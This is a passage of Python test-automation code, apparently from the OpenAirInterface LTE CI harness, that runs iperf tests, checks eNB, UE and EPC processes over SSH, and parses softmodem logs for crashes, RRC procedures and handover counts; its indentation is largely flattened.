self.copyin(iServerIPAddr, iServerUser, iServerPasswd, '/tmp/tmp_iperf_server_' + self.testCase_id + '.log', 'iperf_server_' + self.testCase_id + '_OAI-UE.log')
self.Iperf_analyzeV2Server(lock, '10.0.1.2', 'OAI-UE', status_queue, modified_options)
		# copy the iperf logs to the EPC server for log collection
copyin_res = self.copyin(iServerIPAddr, iServerUser, iServerPasswd, '/tmp/tmp_iperf_server_' + self.testCase_id + '.log', 'iperf_server_' + self.testCase_id + '_OAI-UE.log')
if (copyin_res == 0):
self.copyout(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, 'iperf_server_' + self.testCase_id + '_OAI-UE.log', self.EPCSourceCodePath + '/scripts')
copyin_res = self.copyin(iClientIPAddr, iClientUser, iClientPasswd, '/tmp/tmp_iperf_' + self.testCase_id + '.log', 'iperf_' + self.testCase_id + '_OAI-UE.log')
if (copyin_res == 0):
self.copyout(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, 'iperf_' + self.testCase_id + '_OAI-UE.log', self.EPCSourceCodePath + '/scripts')
iperf_noperf = False
if status_queue.empty():
iperf_status = False
else:
iperf_status = True
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
iperf_status = False
if (count > 0):
iperf_noperf = True
device_id = status_queue.get()
ip_addr = status_queue.get()
message = status_queue.get()
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\nIP Address : ' + ip_addr + '\n' + message + '</pre>'
html_queue.put(html_cell)
if (iperf_noperf and iperf_status):
self.CreateHtmlTestRowQueue(self.iperf_args, 'PERF NOT MET', len(self.UEDevices), html_queue)
elif (iperf_status):
self.CreateHtmlTestRowQueue(self.iperf_args, 'OK', len(self.UEDevices), html_queue)
else:
self.CreateHtmlTestRowQueue(self.iperf_args, 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
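	# Main iperf entry point: delegate to IperfNoS1 in noS1 mode, otherwise run
	# Iperf_common in parallel (one process per UE) and aggregate the per-UE
	# results from the status queue into the HTML report.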
def Iperf(self):
result = re.search('noS1', str(self.Initialize_eNB_args))
if result is not None:
self.IperfNoS1()
return
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '' or self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
if (len(self.UEDevices) == 1) and (self.UEDevices[0] == 'OAI-UE'):
check_OAI_UE = True
else:
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow(self.iperf_args, 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
ueIpStatus = self.GetAllUEIPAddresses()
if (ueIpStatus < 0):
self.CreateHtmlTestRow(self.iperf_args, 'KO', UE_IP_ADDRESS_ISSUE)
self.AutoTerminateUEandeNB()
return
multi_jobs = []
i = 0
ue_num = len(self.UEIPAddresses)
lock = Lock()
status_queue = SimpleQueue()
for UE_IPAddress in self.UEIPAddresses:
device_id = self.UEDevices[i]
p = Process(target = SSH.Iperf_common, args = (lock,UE_IPAddress,device_id,i,ue_num,status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
i = i + 1
for job in multi_jobs:
job.join()
if (status_queue.empty()):
self.CreateHtmlTestRow(self.iperf_args, 'KO', ALL_PROCESSES_OK)
self.AutoTerminateUEandeNB()
else:
iperf_status = True
iperf_noperf = False
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
iperf_status = False
if (count > 0):
iperf_noperf = True
device_id = status_queue.get()
ip_addr = status_queue.get()
message = status_queue.get()
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\nIP Address : ' + ip_addr + '\n' + message + '</pre>'
html_queue.put(html_cell)
if (iperf_noperf and iperf_status):
self.CreateHtmlTestRowQueue(self.iperf_args, 'PERF NOT MET', len(self.UEDevices), html_queue)
elif (iperf_status):
self.CreateHtmlTestRowQueue(self.iperf_args, 'OK', len(self.UEDevices), html_queue)
else:
self.CreateHtmlTestRowQueue(self.iperf_args, 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
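	# Check that the required processes are still running: HSS/MME/SPGW (skipped
	# in noS1 mode), plus the eNB and/or the OAI UE depending on the flags. On
	# eNB failure the eNB log file is retrieved and analyzed. Returns 0 when
	# everything is fine, a negative status code otherwise.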
def CheckProcessExist(self, check_eNB, check_OAI_UE):
multi_jobs = []
status_queue = SimpleQueue()
# in noS1 config, no need to check status from EPC
result = re.search('noS1', str(self.Initialize_eNB_args))
if result is None:
p = Process(target = SSH.CheckHSSProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
p = Process(target = SSH.CheckMMEProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
p = Process(target = SSH.CheckSPGWProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
else:
if (check_eNB == False) and (check_OAI_UE == False):
return 0
if check_eNB:
p = Process(target = SSH.CheckeNBProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
if check_OAI_UE:
p = Process(target = SSH.CheckOAIUEProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
if (status_queue.empty()):
return -15
else:
result = 0
while (not status_queue.empty()):
status = status_queue.get()
if (status < 0):
result = status
if result == ENB_PROCESS_FAILED:
fileCheck = re.search('enb_', str(self.eNBLogFiles[0]))
if fileCheck is not None:
self.copyin(self.eNBIPAddress, self.eNBUserName, self.eNBPassword, self.eNBSourceCodePath + '/cmake_targets/' + self.eNBLogFiles[0], '.')
logStatus = self.AnalyzeLogFile_eNB(self.eNBLogFiles[0])
if logStatus < 0:
result = logStatus
self.eNBLogFiles[0] = ''
if self.flexranCtrlInstalled and self.flexranCtrlStarted:
self.TerminateFlexranCtrl()
return result
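	# Same check, restricted to the OAI UE process; on failure the UE log file is
	# retrieved and analyzed.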
def CheckOAIUEProcessExist(self, initialize_OAI_UE_flag):
multi_jobs = []
status_queue = SimpleQueue()
if initialize_OAI_UE_flag == False:
p = Process(target = SSH.CheckOAIUEProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
if (status_queue.empty()):
return -15
else:
result = 0
while (not status_queue.empty()):
status = status_queue.get()
if (status < 0):
result = status
if result == OAI_UE_PROCESS_FAILED:
fileCheck = re.search('ue_', str(self.UELogFile))
if fileCheck is not None:
self.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/' + self.UELogFile, '.')
logStatus = self.AnalyzeLogFile_UE(self.UELogFile)
if logStatus < 0:
result = logStatus
return result
def CheckOAIUEProcess(self, status_queue):
try:
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('stdbuf -o0 ps -aux | grep --color=never softmodem | grep -v grep', '\$', 5)
result = re.search('lte-uesoftmodem', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m OAI UE Process Not Found! \u001B[0m')
status_queue.put(OAI_UE_PROCESS_FAILED)
else:
status_queue.put(OAI_UE_PROCESS_OK)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def CheckeNBProcess(self, status_queue):
try:
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('stdbuf -o0 ps -aux | grep --color=never softmodem | grep -v grep', '\$', 5)
result = re.search('lte-softmodem', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m eNB Process Not Found! \u001B[0m')
status_queue.put(ENB_PROCESS_FAILED)
else:
status_queue.put(ENB_PROCESS_OK)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def CheckHSSProcess(self, status_queue):
try:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('stdbuf -o0 ps -aux | grep --color=never hss | grep -v grep', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE):
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
else:
result = re.search('hss_sim s6as diam_hss', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m HSS Process Not Found! \u001B[0m')
status_queue.put(HSS_PROCESS_FAILED)
else:
status_queue.put(HSS_PROCESS_OK)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def CheckMMEProcess(self, status_queue):
try:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('stdbuf -o0 ps -aux | grep --color=never mme | grep -v grep', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE):
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
else:
result = re.search('mme', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m MME Process Not Found! \u001B[0m')
status_queue.put(MME_PROCESS_FAILED)
else:
status_queue.put(MME_PROCESS_OK)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def CheckSPGWProcess(self, status_queue):
try:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('stdbuf -o0 ps -aux | grep --color=never spgw | grep -v grep', '\$', 5)
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
else:
self.command('stdbuf -o0 ps -aux | grep --color=never xGw | grep -v grep', '\$', 5)
result = re.search('xGw', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m SPGW Process Not Found! \u001B[0m')
status_queue.put(SPGW_PROCESS_FAILED)
else:
status_queue.put(SPGW_PROCESS_OK)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
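	# Scan a retrieved eNB log file: crashes (segfault, assertion, real-time
	# issues), RRC and X2 handover procedure counters, CDRX activation, RRU
	# slave resynchronization, command-line option checks and various warning
	# counters. Fills self.htmleNBFailureMsg and returns 0 or a negative
	# ENB_PROCESS_* status code.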
def AnalyzeLogFile_eNB(self, eNBlogFile):
if (not os.path.isfile('./' + eNBlogFile)):
return -1
enb_log_file = open('./' + eNBlogFile, 'r')
exitSignalReceived = False
foundAssertion = False
msgAssertion = ''
msgLine = 0
foundSegFault = False
foundRealTimeIssue = False
rrcSetupComplete = 0
rrcReleaseRequest = 0
rrcReconfigRequest = 0
rrcReconfigComplete = 0
rrcReestablishRequest = 0
rrcReestablishComplete = 0
rrcReestablishReject = 0
rlcDiscardBuffer = 0
rachCanceledProcedure = 0
uciStatMsgCount = 0
pdcpFailure = 0
ulschFailure = 0
cdrxActivationMessageCount = 0
dropNotEnoughRBs = 0
self.htmleNBFailureMsg = ''
isRRU = False
isSlave = False
slaveReceivesFrameResyncCmd = False
X2HO_state = X2_HO_REQ_STATE__IDLE
X2HO_inNbProcedures = 0
X2HO_outNbProcedures = 0
for line in enb_log_file.readlines():
if X2HO_state == X2_HO_REQ_STATE__IDLE:
result = re.search('target eNB Receives X2 HO Req X2AP_HANDOVER_REQ', str(line))
if result is not None:
X2HO_state = X2_HO_REQ_STATE__TARGET_RECEIVES_REQ
result = re.search('source eNB receives the X2 HO ACK X2AP_HANDOVER_REQ_ACK', str(line))
if result is not None:
X2HO_state = X2_HO_REQ_STATE__SOURCE_RECEIVES_REQ_ACK
if X2HO_state == X2_HO_REQ_STATE__TARGET_RECEIVES_REQ:
result = re.search('Received LTE_RRCConnectionReconfigurationComplete from UE', str(line))
if result is not None:
X2HO_state = X2_HO_REQ_STATE__TARGET_RRC_RECFG_COMPLETE
if X2HO_state == X2_HO_REQ_STATE__TARGET_RRC_RECFG_COMPLETE:
result = re.search('issue rrc_eNB_send_PATH_SWITCH_REQ', str(line))
if result is not None:
X2HO_state = X2_HO_REQ_STATE__TARGET_SENDS_SWITCH_REQ
if X2HO_state == X2_HO_REQ_STATE__TARGET_SENDS_SWITCH_REQ:
result = re.search('received path switch ack S1AP_PATH_SWITCH_REQ_ACK', str(line))
if result is not None:
X2HO_state = X2_HO_REQ_STATE__IDLE
X2HO_inNbProcedures += 1
if X2HO_state == X2_HO_REQ_STATE__SOURCE_RECEIVES_REQ_ACK:
result = re.search('source eNB receives the X2 UE CONTEXT RELEASE X2AP_UE_CONTEXT_RELEASE', str(line))
if result is not None:
X2HO_state = X2_HO_REQ_STATE__IDLE
X2HO_outNbProcedures += 1
if self.eNBOptions[int(self.eNB_instance)] != '':
res1 = re.search('max_rxgain (?P<requested_option>[0-9]+)', self.eNBOptions[int(self.eNB_instance)])
res2 = re.search('max_rxgain (?P<applied_option>[0-9]+)', str(line))
if res1 is not None and res2 is not None:
requested_option = int(res1.group('requested_option'))
applied_option = int(res2.group('applied_option'))
if requested_option == applied_option:
self.htmleNBFailureMsg += '<span class="glyphicon glyphicon-ok-circle"></span> Command line option(s) correctly applied <span class="glyphicon glyphicon-arrow-right"></span> ' + self.eNBOptions[int(self.eNB_instance)] + '\n\n'
else:
self.htmleNBFailureMsg += '<span class="glyphicon glyphicon-ban-circle"></span> Command line option(s) NOT applied <span class="glyphicon glyphicon-arrow-right"></span> ' + self.eNBOptions[int(self.eNB_instance)] + '\n\n'
result = re.search('Exiting OAI softmodem', str(line))
if result is not None:
exitSignalReceived = True
result = re.search('[Ss]egmentation [Ff]ault', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('[Cc]ore [dD]ump', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('./lte_build_oai/build/lte-softmodem', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('[Aa]ssertion', str(line))
if result is not None and not exitSignalReceived:
foundAssertion = True
result = re.search('LLL', str(line))
if result is not None and not exitSignalReceived:
foundRealTimeIssue = True
if foundAssertion and (msgLine < 3):
msgLine += 1
msgAssertion += str(line)
result = re.search('Setting function for RU', str(line))
if result is not None:
isRRU = True
if isRRU:
result = re.search('RU 0 is_slave=yes', str(line))
if result is not None:
isSlave = True
if isSlave:
result = re.search('Received RRU_frame_resynch command', str(line))
if result is not None:
slaveReceivesFrameResyncCmd = True
result = re.search('LTE_RRCConnectionSetupComplete from UE', str(line))
if result is not None:
rrcSetupComplete += 1
result = re.search('Generate LTE_RRCConnectionRelease|Generate RRCConnectionRelease', str(line))
if result is not None:
rrcReleaseRequest += 1
result = re.search('Generate LTE_RRCConnectionReconfiguration', str(line))
if result is not None:
rrcReconfigRequest += 1
result = re.search('LTE_RRCConnectionReconfigurationComplete from UE rnti', str(line))
if result is not None:
rrcReconfigComplete += 1
result = re.search('LTE_RRCConnectionReestablishmentRequest', str(line))
if result is not None:
rrcReestablishRequest += 1
result = re.search('LTE_RRCConnectionReestablishmentComplete', str(line))
if result is not None:
rrcReestablishComplete += 1
result = re.search('LTE_RRCConnectionReestablishmentReject', str(line))
if result is not None:
rrcReestablishReject += 1
result = re.search('CDRX configuration activated after RRC Connection', str(line))
if result is not None:
cdrxActivationMessageCount += 1
result = re.search('uci->stat', str(line))
if result is not None:
uciStatMsgCount += 1
result = re.search('PDCP.*Out of Resources.*reason', str(line))
if result is not None:
pdcpFailure += 1
result = re.search('ULSCH in error in round', str(line))
if result is not None:
ulschFailure += 1
result = re.search('BAD all_segments_received', str(line))
if result is not None:
rlcDiscardBuffer += 1
result = re.search('Canceled RA procedure for UE rnti', str(line))
if result is not None:
rachCanceledProcedure += 1
result = re.search('dropping, not enough RBs', str(line))
if result is not None:
dropNotEnoughRBs += 1
enb_log_file.close()
logging.debug(' File analysis completed')
if uciStatMsgCount > 0:
statMsg = 'eNB showed ' + str(uciStatMsgCount) + ' "uci->stat" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmleNBFailureMsg += statMsg + '\n'
if pdcpFailure > 0:
statMsg = 'eNB showed ' + str(pdcpFailure) + ' "PDCP Out of Resources" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmleNBFailureMsg += statMsg + '\n'
if ulschFailure > 0:
statMsg = 'eNB showed ' + str(ulschFailure) + ' "ULSCH in error in round" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmleNBFailureMsg += statMsg + '\n'
if dropNotEnoughRBs > 0:
statMsg = 'eNB showed ' + str(dropNotEnoughRBs) + ' "dropping, not enough RBs" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmleNBFailureMsg += statMsg + '\n'
if rrcSetupComplete > 0:
rrcMsg = 'eNB completed ' + str(rrcSetupComplete) + ' RRC Connection Setup(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if rrcReleaseRequest > 0:
rrcMsg = 'eNB requested ' + str(rrcReleaseRequest) + ' RRC Connection Release(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if rrcReconfigRequest > 0 or rrcReconfigComplete > 0:
rrcMsg = 'eNB requested ' + str(rrcReconfigRequest) + ' RRC Connection Reconfiguration(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
rrcMsg = ' -- ' + str(rrcReconfigComplete) + ' were completed'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if rrcReestablishRequest > 0 or rrcReestablishComplete > 0 or rrcReestablishReject > 0:
rrcMsg = 'eNB requested ' + str(rrcReestablishRequest) + ' RRC Connection Reestablishment(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
rrcMsg = ' -- ' + str(rrcReestablishComplete) + ' were completed'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
rrcMsg = ' -- ' + str(rrcReestablishReject) + ' were rejected'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if X2HO_inNbProcedures > 0:
rrcMsg = 'eNB completed ' + str(X2HO_inNbProcedures) + ' X2 Handover Connection procedure(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if X2HO_outNbProcedures > 0:
rrcMsg = 'eNB completed ' + str(X2HO_outNbProcedures) + ' X2 Handover Release procedure(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if self.eNBOptions[int(self.eNB_instance)] != '':
res1 = re.search('drx_Config_present prSetup', self.eNBOptions[int(self.eNB_instance)])
if res1 is not None:
if cdrxActivationMessageCount > 0:
rrcMsg = 'eNB activated the CDRX Configuration for ' + str(cdrxActivationMessageCount) + ' time(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
else:
rrcMsg = 'eNB did NOT ACTIVATE the CDRX Configuration'
logging.debug('\u001B[1;37;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if rachCanceledProcedure > 0:
rachMsg = 'eNB cancelled ' + str(rachCanceledProcedure) + ' RA procedure(s)'
logging.debug('\u001B[1;30;43m ' + rachMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rachMsg + '\n'
if isRRU:
if isSlave:
if slaveReceivesFrameResyncCmd:
rruMsg = 'Slave RRU received the RRU_frame_resynch command from RAU'
logging.debug('\u001B[1;30;43m ' + rruMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rruMsg + '\n'
else:
rruMsg = 'Slave RRU DID NOT receive the RRU_frame_resynch command from RAU'
logging.debug('\u001B[1;37;41m ' + rruMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rruMsg + '\n'
self.prematureExit = True
return ENB_PROCESS_SLAVE_RRU_NOT_SYNCED
if foundSegFault:
logging.debug('\u001B[1;37;41m eNB ended with a Segmentation Fault! \u001B[0m')
return ENB_PROCESS_SEG_FAULT
if foundAssertion:
logging.debug('\u001B[1;37;41m eNB ended with an assertion! \u001B[0m')
self.htmleNBFailureMsg += msgAssertion
return ENB_PROCESS_ASSERTION
if foundRealTimeIssue:
logging.debug('\u001B[1;37;41m eNB faced real time issues! \u001B[0m')
self.htmleNBFailureMsg += 'eNB faced real time issues!\n'
#return ENB_PROCESS_REALTIME_ISSUE
if rlcDiscardBuffer > 0:
rlcMsg = 'eNB RLC discarded ' + str(rlcDiscardBuffer) + ' buffer(s)'
logging.debug('\u001B[1;37;41m ' + rlcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rlcMsg + '\n'
return ENB_PROCESS_REALTIME_ISSUE
return 0
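	# Scan a retrieved UE log file: crashes, synchronization information (MIB,
	# measured carrier frequency, PLMN, operator), RRCConnectionReconfiguration
	# completions and various warning counters. Fills self.htmlUEFailureMsg and
	# returns 0 or an error status code.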
def AnalyzeLogFile_UE(self, UElogFile):
if (not os.path.isfile('./' + UElogFile)):
return -1
ue_log_file = open('./' + UElogFile, 'r')
exitSignalReceived = False
foundAssertion = False
msgAssertion = ''
msgLine = 0
foundSegFault = False
foundRealTimeIssue = False
uciStatMsgCount = 0
pdcpDataReqFailedCount = 0
badDciCount = 0
rrcConnectionRecfgComplete = 0
no_cell_sync_found = False
mib_found = False
frequency_found = False
plmn_found = False
self.htmlUEFailureMsg = ''
for line in ue_log_file.readlines():
result = re.search('Exiting OAI softmodem', str(line))
if result is not None:
exitSignalReceived = True
result = re.search('System error|[Ss]egmentation [Ff]ault|======= Backtrace: =========|======= Memory map: ========', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('[Cc]ore [dD]ump', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('./lte-uesoftmodem', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('[Aa]ssertion', str(line))
if result is not None and not exitSignalReceived:
foundAssertion = True
result = re.search('LLL', str(line))
if result is not None and not exitSignalReceived:
foundRealTimeIssue = True
if foundAssertion and (msgLine < 3):
msgLine += 1
msgAssertion += str(line)
result = re.search('uci->stat', str(line))
if result is not None and not exitSignalReceived:
uciStatMsgCount += 1
result = re.search('PDCP data request failed', str(line))
if result is not None and not exitSignalReceived:
pdcpDataReqFailedCount += 1
result = re.search('bad DCI 1A', str(line))
if result is not None and not exitSignalReceived:
badDciCount += 1
result = re.search('Generating RRCConnectionReconfigurationComplete', str(line))
if result is not None:
rrcConnectionRecfgComplete += 1
# No cell synchronization found, abandoning
result = re.search('No cell synchronization found, abandoning', str(line))
if result is not None:
no_cell_sync_found = True
result = re.search("MIB Information => ([a-zA-Z]{1,10}), ([a-zA-Z]{1,10}), NidCell (?P<nidcell>\d{1,3}), N_RB_DL (?P<n_rb_dl>\d{1,3}), PHICH DURATION (?P<phich_duration>\d), PHICH RESOURCE (?P<phich_resource>.{1,4}), TX_ANT (?P<tx_ant>\d)", str(line))
if result is not None and (not mib_found):
try:
mibMsg = "MIB Information: " + result.group(1) + ', ' + result.group(2)
self.htmlUEFailureMsg += mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " nidcell = " + result.group('nidcell')
self.htmlUEFailureMsg += mibMsg
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " n_rb_dl = " + result.group('n_rb_dl')
self.htmlUEFailureMsg += mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " phich_duration = " + result.group('phich_duration')
self.htmlUEFailureMsg += mibMsg
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " phich_resource = " + result.group('phich_resource')
self.htmlUEFailureMsg += mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " tx_ant = " + result.group('tx_ant')
self.htmlUEFailureMsg += mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
mib_found = True
except Exception as e:
logging.error('\033[91m' + "MIB marker was not found" + '\033[0m')
result = re.search("Measured Carrier Frequency (?P<measured_carrier_frequency>\d{1,15}) Hz", str(line))
if result is not None and (not frequency_found):
try:
mibMsg = "Measured Carrier Frequency = " + result.group('measured_carrier_frequency') + ' Hz'
self.htmlUEFailureMsg += mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
frequency_found = True
except Exception as e:
logging.error('\033[91m' + "Measured Carrier Frequency not found" + '\033[0m')
result = re.search("PLMN MCC (?P<mcc>\d{1,3}), MNC (?P<mnc>\d{1,3}), TAC", str(line))
if result is not None and (not plmn_found):
try:
mibMsg = 'PLMN MCC = ' + result.group('mcc') + ' MNC = ' + result.group('mnc')
self.htmlUEFailureMsg += mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
plmn_found = True
except Exception as e:
logging.error('\033[91m' + "PLMN not found" + '\033[0m')
result = re.search("Found (?P<operator>[\w,\s]{1,15}) \(name from internal table\)", str(line))
if result is not None:
try:
mibMsg = "The operator is: " + result.group('operator')
self.htmlUEFailureMsg += mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
except Exception as e:
logging.error('\033[91m' + "Operator name not found" + '\033[0m')
result = re.search("SIB5 InterFreqCarrierFreq element (.{1,4})/(.{1,4})", str(line))
if result is not None:
try:
mibMsg = "SIB5 InterFreqCarrierFreq element " + result.group(1) + '/' + result.group(2)
self.htmlUEFailureMsg += mibMsg + ' -> '
logging.debug('\033[94m' + mibMsg + '\033[0m')
except Exception as e:
logging.error('\033[91m' + "SIB5 InterFreqCarrierFreq element not found" + '\033[0m')
result = re.search("DL Carrier Frequency/ARFCN : (?P<carrier_frequency>\d{1,15}/\d{1,4})", str(line))
if result is not None:
try:
freq = result.group('carrier_frequency')
new_freq = re.sub('/[0-9]+','',freq)
float_freq = float(new_freq) / 1000000
self.htmlUEFailureMsg += 'DL Freq: ' + ('%.1f' % float_freq) + ' MHz'
logging.debug('\033[94m' + " DL Carrier Frequency is: " + freq + '\033[0m')
except Exception as e:
logging.error('\033[91m' + " DL Carrier Frequency not found" + '\033[0m')
result = re.search("AllowedMeasBandwidth : (?P<allowed_bandwidth>\d{1,7})", str(line))
if result is not None:
try:
prb = result.group('allowed_bandwidth')
self.htmlUEFailureMsg += ' -- PRB: ' + prb + '\n'
logging.debug('\033[94m' + " AllowedMeasBandwidth: " + prb + '\033[0m')
except Exception as e:
logging.error('\033[91m' + " AllowedMeasBandwidth not found" + '\033[0m')
ue_log_file.close()
if rrcConnectionRecfgComplete > 0:
statMsg = 'UE connected to eNB (' + str(rrcConnectionRecfgComplete) + ' RRCConnectionReconfigurationComplete message(s) generated)'
logging.debug('\033[94m' + statMsg + '\033[0m')
self.htmlUEFailureMsg += statMsg + '\n'
if uciStatMsgCount > 0:
statMsg = 'UE showed ' + str(uciStatMsgCount) + ' "uci->stat" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmlUEFailureMsg += statMsg + '\n'
if pdcpDataReqFailedCount > 0:
statMsg = 'UE showed ' + str(pdcpDataReqFailedCount) + ' "PDCP data request failed" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmlUEFailureMsg += statMsg + '\n'
if badDciCount > 0:
statMsg = 'UE showed ' + str(badDciCount) + ' "bad DCI 1A" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmlUEFailureMsg += statMsg + '\n'
if foundSegFault:
logging.debug('\u001B[1;37;41m UE ended with a Segmentation Fault! \u001B[0m')
return ENB_PROCESS_SEG_FAULT
if foundAssertion:
logging.debug('\u001B[1;30;43m UE showed an assertion! \u001B[0m')
self.htmlUEFailureMsg += 'UE showed an assertion!\n'
if not mib_found or not frequency_found:
return OAI_UE_PROCESS_ASSERTION
if foundRealTimeIssue:
logging.debug('\u001B[1;37;41m UE faced real time issues! \u001B[0m')
self.htmlUEFailureMsg += 'UE faced real time issues!\n'
#return ENB_PROCESS_REALTIME_ISSUE
if no_cell_sync_found and not mib_found:
logging.debug('\u001B[1;37;41m UE could not synchronize ! \u001B[0m')
self.htmlUEFailureMsg += 'UE could not synchronize!\n'
return OAI_UE_PROCESS_COULD_NOT_SYNC
return 0
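	# Stop the eNB softmodem on the selected server (SIGINT first, SIGKILL if it
	# is still running). When the T tracer was enabled, also stop tshark on the
	# EPC, replay the raw record file and analyze the extracted messages;
	# otherwise retrieve and analyze the regular eNB log file.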
def TerminateeNB(self):
if self.eNB_serverId == '0':
lIpAddr = self.eNBIPAddress
lUserName = self.eNBUserName
lPassWord = self.eNBPassword
lSourcePath = self.eNBSourceCodePath
elif self.eNB_serverId == '1':
lIpAddr = self.eNB1IPAddress
lUserName = self.eNB1UserName
lPassWord = self.eNB1Password
lSourcePath = self.eNB1SourceCodePath
elif self.eNB_serverId == '2':
lIpAddr = self.eNB2IPAddress
lUserName = self.eNB2UserName
lPassWord = self.eNB2Password
lSourcePath = self.eNB2SourceCodePath
if lIpAddr == '' or lUserName == '' or lPassWord == '' or lSourcePath == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(lIpAddr, lUserName, lPassWord)
self.command('cd ' + lSourcePath + '/cmake_targets', '\$', 5)
self.command('stdbuf -o0 ps -aux | grep --color=never softmodem | grep -v grep', '\$', 5)
result = re.search('lte-softmodem', str(self.ssh.before))
if result is not None:
self.command('echo ' + lPassWord + ' | sudo -S daemon --name=enb' + str(self.eNB_instance) + '_daemon --stop', '\$', 5)
